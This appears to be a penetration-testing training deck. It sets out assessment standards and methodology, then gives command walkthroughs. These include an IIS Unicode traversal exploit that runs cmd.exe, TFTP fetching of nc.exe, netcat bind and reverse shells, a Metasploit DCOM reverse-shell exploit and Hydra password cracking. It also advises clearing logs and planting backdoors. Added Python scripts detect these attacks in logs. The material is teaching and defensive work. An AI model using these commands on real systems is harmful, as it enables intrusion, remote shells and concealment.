Program: Certified Computer Security Analyst (CCSA)
LSP Telematika
Created By Semi Yulianto
Shared By Linuxer@kaskus.co.id
Semi Yulianto
MCT, MCP, MCSA, MCSE, MCSA & MCSE: Security, MCTS, MCITP, CCNA, CCNP, CNI, CNA, CNE, CCA,
CIW-CI, CIW-SA, CEI, CEH, ECSA, CHFI, EDRP, ECSP, etc.
Independent Trainer and Consultant
EC-Council Indonesia & Asia Pacific (Jakarta, Indonesia)

Current Roles:
    ITS2 (Riyadh, Saudi Arabia)
    Senior Technical Trainer/Security Consultant

    IshanTech (M) Sdn Bhd (Kuala Lumpur, Malaysia)
    Security Consultant (Web Application Pen-Tester)
    Security Consultant (ESET Anti-Virus & Smart Security)

Contacts:
    semi.yulianto@flexi-learn.com and semi.yulianto2009@gmail.com
    +62 852 1325 6600 and +60 14 9377 462
1.   Vulnerabilities by Management Categories
2.   Assessment Standards
3.   Assessment Service Definition
4.   Network Assessment Methodology
5.   Pen-Test Methodology
6.   Security Tools
7.   Investigating Vulnerabilities
Vulnerabilities by Management Categories:

    OS configuration - Vulnerabilities due to improperly configured operating system software.

    Software maintenance - Vulnerabilities due to failure to apply patches to known vulnerabilities.

    Password/access control - Failure to comply with password policy and improper access control settings.

    Malicious software - Existence of malicious software (Trojans, worms, etc.) or evidence of use.

    Dangerous services - Existence of vulnerable or easily exploited services or processes.

    Application configuration - Vulnerabilities due to improperly configured applications.
NSA (US)
    The United States National Security Agency (NSA) has provided an INFOSEC Assessment Methodology (IAM) framework to help consultants and security professionals outside the NSA provide assessment services to clients in line with a recognized standard.
    http://www.iatrp.com

CESG CHECK (UK)
    The Government Communications Headquarters (GCHQ) in the United Kingdom has an information assurance arm known as the Communications and Electronics Security Group (CESG). In the same way that the NSA IAM framework allows security consultants outside the NSA to provide assessment services, CESG operates a program known as CHECK to evaluate and accredit security testing teams within the U.K. to undertake government assessment work.
    http://www.cesg.gov.uk/site/check/index.cfm
The IAM framework defines three levels of assessment:

    Assessment - Level 1 involves discovering a cooperative high-level overview of the organization being assessed, including access to policies, procedures, and information flow. No hands-on network or system testing is undertaken at this level.

    Evaluation - Level 2 is a hands-on cooperative process that involves testing with network scanning, penetration tools, and the use of specific technical expertise.

    Red Team - Level 3 is non-cooperative and external to the target network, involving penetration testing to simulate the appropriate adversary. IAM assessment is non-intrusive, so within this framework, a Level 3 assessment involves full qualification of vulnerabilities.
CESG CHECK network security assessment competencies:

1. Use of DNS information retrieval tools for both single and
   multiple records, including an understanding of DNS record
   structure relating to target hosts.
2. Use of ICMP, TCP, and UDP network mapping and probing tools.
3. Demonstration of TCP service banner grabbing.
4. Information retrieval using SNMP, including an understanding
   of MIB structure relating to target system configuration and
   network routes.
5. Understanding of common weaknesses in routers and switches
   relating to Telnet, HTTP, SNMP, and TFTP access and
   configuration.
CESG CHECK Unix-specific competencies:

1. User enumeration via finger, rusers, rwho, and SMTP
   techniques.
2. Use of tools to enumerate Remote Procedure Call (RPC)
   services and demonstrate an understanding of the security
   implications associated with those services.
3. Demonstration of testing for Network File System (NFS)
   weaknesses.
4. Testing for weaknesses within r-services (rsh, rexec, and
   rlogin).
5. Detection of insecure X Windows servers.
6. Testing for weaknesses within web, FTP, and Samba services.
CESG CHECK Windows NT-specific competencies:

1. Assessment of NetBIOS and CIFS services to enumerate
   users, groups, shares, domains, domain controllers,
   password policies, and associated weaknesses.
2. Username and password grinding via NetBIOS and CIFS
   services.
3. Detecting and demonstrating presence of known security
   weaknesses within Internet Information Server (IIS) web and
   FTP service components, and Microsoft SQL Server.
Other Assessment Standards & Associations:

 ISECOM’s Open Source Security Testing Methodology Manual (OSSTMM)
  http://www.osstmm.org
 Council of Registered Ethical Security Testers (CREST)
  http://www.crestapproved.com
 TIGER Scheme
  http://www.tigerscheme.org
 EC-Council’s Certified Ethical Hacker (CEH)
  http://www.eccouncil.org/CEH.htm
 Open Source Web Application Security Project (OWASP)
  http://www.owasp.org
1.   Vulnerability Scanning
2.   Network Security Assessment
3.   Web Application Testing
4.   Penetration Testing
5.   Onsite Audit
Vulnerability Scanning
    Uses automated systems (such as Nessus, ISS Internet Scanner, QualysGuard, or eEye Retina) with minimal hands-on qualification and assessment of vulnerabilities. This is an inexpensive way to ensure that no obvious vulnerabilities exist, but it doesn’t provide a clear strategy to improve security.

Network Security Assessment
    An effective blend of automated and hands-on manual vulnerability testing and qualification. The report is usually handwritten, accurate, and concise, giving practical advice that can improve a company’s security.

Web Application Testing
    Involves post-authentication assessment of web application components, identifying command injection, poor permissions, and other weaknesses within a given web application. Testing at this level involves extensive manual qualification and consultant involvement, and it cannot be easily automated.

Penetration Testing
    Involves multiple attack vectors (e.g., telephone war dialing, social engineering, and wireless testing) to compromise the target environment. It demonstrates and discusses the methodologies adopted by determined Internet-based attackers to compromise IP networks remotely, which in turn will allow you to improve IP network security.

Onsite Audit
    Provides the clearest picture of network security. Consultants have local system access and run tools on each system capable of identifying anything untoward, including rootkits, weak user passwords, poor permissions, and other issues. 802.11 wireless testing is often performed as part of onsite auditing.
High-level components of Network Assessment:

1. Network reconnaissance to identify IP networks
   and hosts of interest.
2. Bulk network scanning and probing to identify
   potentially vulnerable hosts.
3. Investigation of vulnerabilities and further network
   probing by hand.
4. Exploitation of vulnerabilities and circumvention of
   security mechanisms.
1.   Information Gathering
2.   Service Enumeration
3.   Vulnerability Identification
4.   Penetration
5.   Maintaining Access
6.   Housekeeping
Information Gathering
    The objective of information gathering is to find as much information as possible about the target of evaluation by using passive (Google, Whois, WWW) or active (social engineering) information gathering.

Service Enumeration
    Involves launching network and port scanning to find open and filtered ports and the services running on a specific port.

Vulnerability Identification
    Involves finding new and currently available vulnerabilities on the operating systems, applications and/or services (manual or automated).

Penetration
    Involves active penetration on a specific target of evaluation by exploiting any new or known vulnerability.

Maintaining Access
    Involves uploading a trojan or backdoor with the objective of making it easier to go in and out of a target of evaluation without having to redo the exploitation, and ensuring that the activities are not noticed.

Housekeeping
    Cleaning up to cover tracks. Involves disabling audit settings and clearing or altering log files (system, security and application).
Scanning Tools:

1. Nmap (http://www.insecure.org)
2. Nessus (http://www.nessus.org)
3. ISS Internet Scanner (http://www.iss.net)
4. eEye Retina (http://www.eeye.com)
5. QualysGuard (http://www.qualys.com)
6. Matta Colossus (http://www.trustmatta.com)

Exploitation Frameworks:

1. Metasploit Framework (http://www.metasploit.com)
2. Core IMPACT (http://www.coresecurity.com)
3. Immunity CANVAS (http://www.immunityinc.com/products-canvas.shtml)

Proxy-based web application testing tools:

1. Paros (http://www.parosproxy.org)
2. WebScarab (http://www.owasp.org/index.php/Category:OWASP_WebScarab_Project)
3. Burp suite (http://portswigger.net)

Active web application crawling and fuzzing tools:

1. Wapiti (http://wapiti.sourceforge.net)
2. Nikto (http://www.cirt.net/code/nikto.shtml)

Web Application Scanning Tools:

1. Acunetix Web Vulnerability Scanner (http://www.acunetix.com)
2. Watchfire AppScan (http://www.watchfire.com/products/appscan/)
3. SPI Dynamics WebInspect (http://www.spidynamics.com/products/webinspect/)
4. Cenzic Hailstorm (http://www.cenzic.com/products_services/cenzic_hailstorm.php)

Useful Websites:

1. Securiteam (http://www.securiteam.com)
2. SecurityFocus (http://www.securityfocus.com)
3. milw0rm (http://www.milw0rm.com)
4. Offensive Security Exploit DB (http://www.exploit-db.com)
5. Packet Storm (http://www.packetstormsecurity.org)
6. FrSIRT (http://www.frsirt.com)
7. MITRE Corporation CVE (http://cve.mitre.org)
8. NIST National Vulnerability Database (http://nvd.nist.gov)
9. ISS X-Force (http://xforce.iss.net)
10. CERT vulnerability notes (http://www.kb.cert.org/vuls)
11. eEye Preview (http://research.eeye.com/html/services)
12. 3Com TippingPoint DVLabs (http://dvlabs.tippingpoint.com)
13. VeriSign iDefense Security Intelligence Services (http://labs.idefense.com/services)
1.    Information Gathering
2.    Service Identification
3.    Vulnerability Identification
4.    Penetration (Exploitation)
5.    Maintaining Access
6.    Housekeeping (Covering Tracks)
7.    Password Cracking
8.    Client-Side Hacking
9.    Web Application Hacking
10.   Denial-of-Service (DoS) Attacks
11.   Sniffing and ARP Spoofing
12.   Wireless Hacking
13.   Linux Hacking
14.   Analyzing Attack Signatures with IDS and Sniffer
15.   Evading IDS and Firewall
IIS Unicode Directory Traversal Exploit

   Syntax:
    nc -v <target_ip> <http_port>
    GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

   Example:
    nc -v 131.107.1.101 80
    GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+dir
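A defender-side companion to the request shown above: the following Python script is an example added here, not material from the original deck. It reads constructed IIS-style (W3C extended) log lines, canonicalises each request path by bounded repeated percent-decoding so that the double-encoded `%255c` separator collapses to a plain path separator, and flags requests that climb out of the web root, that use double encoding, or that reference an executable. The log lines, field layout and function names are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Constructed IIS (W3C extended) log lines, fields:
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
# Sample data written for this example, not taken from the page.
SAMPLE_IIS_LOG = """\
2009-01-01 10:00:01 131.107.1.252 GET /scripts/..%255c../winnt/system32/cmd.exe /c+dir 200
2009-01-01 10:00:02 131.107.1.50 GET /index.html - 200
2009-01-01 10:00:03 131.107.1.252 GET /scripts/..%255c../winnt/system32/cmd.exe /c+tftp+-i+131.107.1.252+GET+nc.exe 200
2009-01-01 10:00:04 131.107.1.60 GET /docs/../index.html - 200
2009-01-01 10:00:05 131.107.1.70 GET /images/..%5c..%5cwinnt/win.ini - 404
"""

EXECUTABLE_RE = re.compile(r"\.(exe|com|bat|cmd)$", re.I)


def canonicalize(path, max_rounds=3):
    """Percent-decode repeatedly (bounded, so a hostile input cannot loop us)
    and normalise backslashes to slashes. %255c -> %5c -> \\ -> /"""
    rounds, prev = 0, None
    while path != prev and rounds < max_rounds:
        prev, path = path, unquote(path)
        rounds += 1
    return path.replace("\\", "/")


def escapes_webroot(path):
    """True when the canonical path has more '..' than real segments above it,
    i.e. it resolves to somewhere outside the web root."""
    depth = 0
    for seg in canonicalize(path).split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def analyse(raw_stem):
    reasons = []
    if escapes_webroot(raw_stem):
        reasons.append("traversal")
    if "%25" in raw_stem:                      # an encoded '%' means double encoding
        reasons.append("double-encoding")
    if EXECUTABLE_RE.search(canonicalize(raw_stem)):
        reasons.append("executable")
    return reasons


def scan_log(text):
    """Return one finding per suspicious request; a 200 status on a flagged
    request means the server actually served it and needs triage first."""
    findings = []
    for line in text.splitlines():
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        _date, _time, client, _method, stem, query, status = parts[:7]
        reasons = analyse(stem)
        if reasons:
            findings.append({
                "client": client,
                "path": stem,
                "canonical": canonicalize(stem),
                "query": query,
                "status": status,
                "succeeded": status == "200",
                "reasons": reasons,
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_IIS_LOG):
        print(f["client"], f["status"], ",".join(f["reasons"]), f["canonical"], f["query"])
```

The in-root relative path `/docs/../index.html` is deliberately left unflagged: the depth counter only fires when the request resolves above the root, which keeps the noise down on real logs. A bounded decode loop is used rather than a single `unquote` because a single pass leaves `%255c` as the harmless-looking `%5c`.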
TFTP (Trivial File Transfer Protocol)

Upload and Download
   Syntax:
    tftp -i <localhost_ip> GET <file>
    tftp -i <localhost_ip> PUT <file>

   Example:
    tftp -i 131.107.1.252 GET nc.exe
    tftp -i 131.107.1.101 PUT nc.exe

   Unicode Example:
    GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+131.107.1.252+GET+nc.exe
Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
   Syntax:
    nc -v -l -p <port_to_listen_to>
    nc -vlp <port_to_listen_to>

   Example:
    nc -v -l -p 555
    nc -vlp 555

Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
   Syntax:
    nc -v <target_ip> <target_port>

   Example:
    nc -v 131.107.1.101 555

Netcat (Network Swiss Army Knife)

Server Mode (listening/reverse TCP)
   Syntax:
    nc -v -l -p <listening_port>

   Unicode Syntax:
    GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

   Example:
    GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+-l+-p+5555

Netcat (Network Swiss Army Knife)

Client Mode (connecting/bind TCP)
   Syntax:
    nc -v <target_ip> <target_port>

   Unicode Syntax:
    GET http://<target_ip>/scripts/<unicode_strings>/<windows_dir>/cmd.exe?/c+<command>

   Example:
    GET http://131.107.1.101/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-v+131.107.1.252+555
Nmap (Ping Sweep/Network Scan)
   Syntax:
    nmap -sP <network_id>

   Example:
    nmap -sP 131.107.1.0/24

Nmap (Port Scan)
   Syntax:
    nmap <target_ip>

   Example:
    nmap 131.107.1.101

Nmap (Port Scan with Options)
   Syntax:
    nmap <option> <target_ip>

   Examples:
    nmap -sS -sV -O 131.107.1.101
    nmap -sS -sV -p80,443 -O 131.107.1.101
    nmap -sS -sV -p80,443 -O -T4 131.107.1.101
    nmap -sS -sV -p80,443 -O -T4 -PN 131.107.1.101
    nmap -sU -sV -O 131.107.1.101
    nmap -A 131.107.1.101

Nmap (Enumeration)
   Syntax:
    nmap <option> <script> <target_ip>

   Examples:
    nmap -sS --script=smb-enum-users 131.107.1.101
    nmap -sS --script=smb-enum-shares 131.107.1.101
    nmap -sS --script=smb-enum-domains 131.107.1.101
    nmap -sS --script=smb-enum-processes 131.107.1.101
    nmap -sS --script=smb-enum-security 131.107.1.101
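The scans above produce, per host, a list of ports and detected services; what a practitioner then needs is to compare that list with what each host is supposed to expose. The Python below is an example added here, not the deck's own material: it parses constructed nmap grepable (`-oG`) output, keeps only entries in the `open` state and reports any open port that is missing from an approved baseline. The sample output, the baseline and the function names are constructed for this example. One known limitation is noted in the code: nmap escapes a literal slash inside the version column as `\/`, and this parser does not unescape it.

```python
import re

# Constructed nmap grepable (-oG) output for two hosts. Sample data written
# for this example, not output captured from the scans on the page.
SAMPLE_GNMAP = """\
# Nmap 5.21 scan initiated Thu Jan  1 10:00:00 2009 as: nmap -sS -sV -oG - 131.107.1.0/24
Host: 131.107.1.101 ()\tStatus: Up
Host: 131.107.1.101 ()\tPorts: 80/open/tcp//http//Microsoft IIS httpd 5.0/, 445/open/tcp//microsoft-ds///, 1433/open/tcp//ms-sql-s//Microsoft SQL Server 2000/, 135/filtered/tcp//msrpc///\tIgnored State: closed (996)
Host: 131.107.1.252 ()\tStatus: Up
Host: 131.107.1.252 ()\tPorts: 22/open/tcp//ssh//OpenSSH 5.1/, 69/open|filtered/udp//tftp///\tIgnored State: closed (998)
# Nmap done at Thu Jan  1 10:00:30 2009 -- 256 IP addresses (2 hosts up) scanned in 30.12 seconds
"""

# A "Ports:" record; the trailing "Ignored State" column is optional.
PORTS_RE = re.compile(
    r"^Host: (?P<ip>\S+) \((?P<name>[^)]*)\)\tPorts: (?P<ports>.*?)(?:\tIgnored State:.*)?$"
)


def parse_gnmap(text):
    """Return {ip: [ {port, state, proto, service, version}, ... ]} with every
    port entry nmap reported, whatever its state."""
    inventory = {}
    for line in text.splitlines():
        m = PORTS_RE.match(line)
        if not m:
            continue
        entries = []
        for item in m.group("ports").split(", "):
            # Column layout: port/state/proto/owner/service/rpcinfo/version/
            # (a literal '/' inside version is escaped by nmap as '\/'; not unescaped here)
            f = item.split("/")
            if len(f) < 7:
                continue
            entries.append({
                "port": int(f[0]),
                "state": f[1],
                "proto": f[2],
                "service": f[4],
                "version": f[6],
            })
        inventory[m.group("ip")] = entries
    return inventory


def open_ports(inventory):
    """{ip: {(proto, port), ...}} restricted to entries nmap called 'open'
    ('open|filtered' from UDP scans is deliberately excluded as unconfirmed)."""
    return {
        ip: {(e["proto"], e["port"]) for e in ents if e["state"] == "open"}
        for ip, ents in inventory.items()
    }


def unexpected_exposure(inventory, baseline):
    """baseline: {ip: set of (proto, port) that are approved for that host}.
    Returns {ip: sorted list of open ports not in the baseline}; a host absent
    from the baseline has every open port reported."""
    report = {}
    for ip, ports in open_ports(inventory).items():
        extra = ports - baseline.get(ip, set())
        if extra:
            report[ip] = sorted(extra)
    return report


if __name__ == "__main__":
    approved = {"131.107.1.101": {("tcp", 80)}, "131.107.1.252": {("tcp", 22)}}
    for ip, extra in unexpected_exposure(parse_gnmap(SAMPLE_GNMAP), approved).items():
        print(ip, "unexpected open ports:", extra)
```

Run the scan with `-oG` to a file (or `-oG -` for stdout) and feed the text to `parse_gnmap`; the inventory it returns also carries the version strings from `-sV`, which is what you compare against the patch level you expect on each host.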
Metasploit Framework Exploit Module (MSFConsole)

    cd /pentest/exploits/msf3
    ./msfconsole

   Syntax:
    msf >     help
    msf >     show exploits
    msf >     use <exploit_module>
    msf >     show payloads
    msf >     set PAYLOAD <payload_type>
    msf >     show options
    msf >     set RHOST <target_ip>
    msf >     set LHOST <localhost_ip>
    msf >     set LPORT <local_port>
    msf >     set RPORT <remote_port>
    msf >     show targets
    msf >     set TARGET <target_id>
    msf >     exploit
Metasploit Framework Exploit Module (MSFConsole)

    cd /pentest/exploits/msf3
    ./msfconsole

   Example:
    msf > help
    msf > show exploits
    msf > use windows/dcerpc/ms03_026_dcom
    msf > show payloads
    msf > set PAYLOAD windows/shell/reverse_tcp
    msf > show options
    msf > set RHOST 131.107.1.101
    msf > set LHOST 131.107.1.252
    msf > set LPORT 5555
    msf > set RPORT 1234
    msf > show targets
    msf > set TARGET 0
    msf > exploit
Metasploit Framework Auxiliary Module

    cd /pentest/exploits/msf3
    ./msfconsole

   Syntax:
    msf >     help
    msf >     show auxiliary
    msf >     use <auxiliary_module>
    msf >     set RHOSTS <target_ip_or_network_id>
    msf >     run
Metasploit Framework Auxiliary Module

    cd /pentest/exploits/msf3
    ./msfconsole

   Example 1:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 131.107.1.101
    msf > run

   Example 2:
    msf > help
    msf > show auxiliary
    msf > use scanner/smb/smb_version
    msf > set RHOSTS 131.107.1.0/24
    msf > run
Metasploit Framework Exploit Module (MSFCLI)

    cd /pentest/exploits/msf3

   Syntax:
    ./msfcli <exploit_module> <payload_type>
    <options> E

   Example:
    ./msfcli windows/dcerpc/ms03_026_dcom
      PAYLOAD=windows/shell/bind_tcp
      RHOST=131.107.1.101 E
THC Hydra (Dictionary-based Password Cracking)

    cd /tmp

   Syntax:
    ./hydra -L <users_file> -P <passwords_file> <target_ip> <service_type>

   Examples:
    ./hydra -L login.txt -P pass.txt 131.107.1.101 ftp
    ./hydra -L login.txt -P pass.txt 131.107.1.101 smb
    ./hydra -L login.txt -P pass.txt 131.107.1.101 mssql
    ./hydra -L login.txt -P pass.txt 131.107.1.101 rpc
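What a dictionary attack such as the FTP run above looks like from the server side: the Python below is an example added here, not part of the original deck. It reads constructed vsftpd-style log lines, counts failed logins per client address within a sliding time window, lists the usernames tried, and marks the case where a successful login follows the burst from the same address, which is the event worth escalating. The log lines, the threshold and the window length are constructed assumptions for this example.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed vsftpd-style log lines (not taken from the page): a burst of
# failures against several accounts from one client, then a success.
SAMPLE_FTP_LOG = """\
Thu Jan  1 10:00:01 2009 [pid 2001] [admin] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:02 2009 [pid 2002] [admin] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:02 2009 [pid 2003] [root] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:03 2009 [pid 2004] [guest] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:03 2009 [pid 2005] [ftp] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:04 2009 [pid 2006] [admin] FAIL LOGIN: Client "131.107.1.252"
Thu Jan  1 10:00:05 2009 [pid 2007] [admin] OK LOGIN: Client "131.107.1.252"
Thu Jan  1 10:05:00 2009 [pid 2010] [bob] FAIL LOGIN: Client "131.107.1.50"
Thu Jan  1 10:05:30 2009 [pid 2011] [bob] OK LOGIN: Client "131.107.1.50"
"""

LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] (?P<result>OK|FAIL) LOGIN: Client "(?P<ip>[^"]+)"'
)


def parse_line(line):
    """(timestamp, user, 'OK'|'FAIL', client_ip) or None for unrelated lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%a %b %d %H:%M:%S %Y")
    return ts, m.group("user"), m.group("result"), m.group("ip")


def detect_password_guessing(log_text, threshold=5, window_seconds=60):
    """Alert on any client with >= threshold failed logins inside a sliding
    window; also note a success from that client within the window after the
    burst (a guessed credential rather than a typo)."""
    window = timedelta(seconds=window_seconds)
    recent = defaultdict(deque)   # ip -> (ts, user) failures still inside the window
    alerts = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, user, result, ip = rec
        if result == "FAIL":
            q = recent[ip]
            q.append((ts, user))
            while q and ts - q[0][0] > window:
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {
                    "ip": ip, "first": q[0][0],
                    "success_after_burst": False, "success_user": None,
                })
                a["failures"] = len(q)
                a["users"] = sorted({u for _, u in q})
                a["last"] = ts
        elif ip in alerts and ts - alerts[ip]["last"] <= window:
            alerts[ip]["success_after_burst"] = True
            alerts[ip]["success_user"] = user
    return [alerts[ip] for ip in sorted(alerts)]


if __name__ == "__main__":
    for a in detect_password_guessing(SAMPLE_FTP_LOG):
        print(a["ip"], a["failures"], "failures against", a["users"],
              "then success as", a["success_user"] if a["success_after_burst"] else "nobody")
```

The single failure from `131.107.1.50` followed by a success half a minute later is the ordinary mistyped-password pattern and produces no alert; the distinct-usernames list on the alert is what separates a targeted guess against one account from a sweep across many, and the same counting logic applies unchanged to the SMB and MSSQL services listed above once their log formats are parsed.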
Nikto (Web Application Vulnerability Scanner)

    cd /pentest/nikto

   Syntax:
    ./nikto.pl -host <target_ip>

   Example:
    ./nikto.pl -host 131.107.1.101

NSA and PT
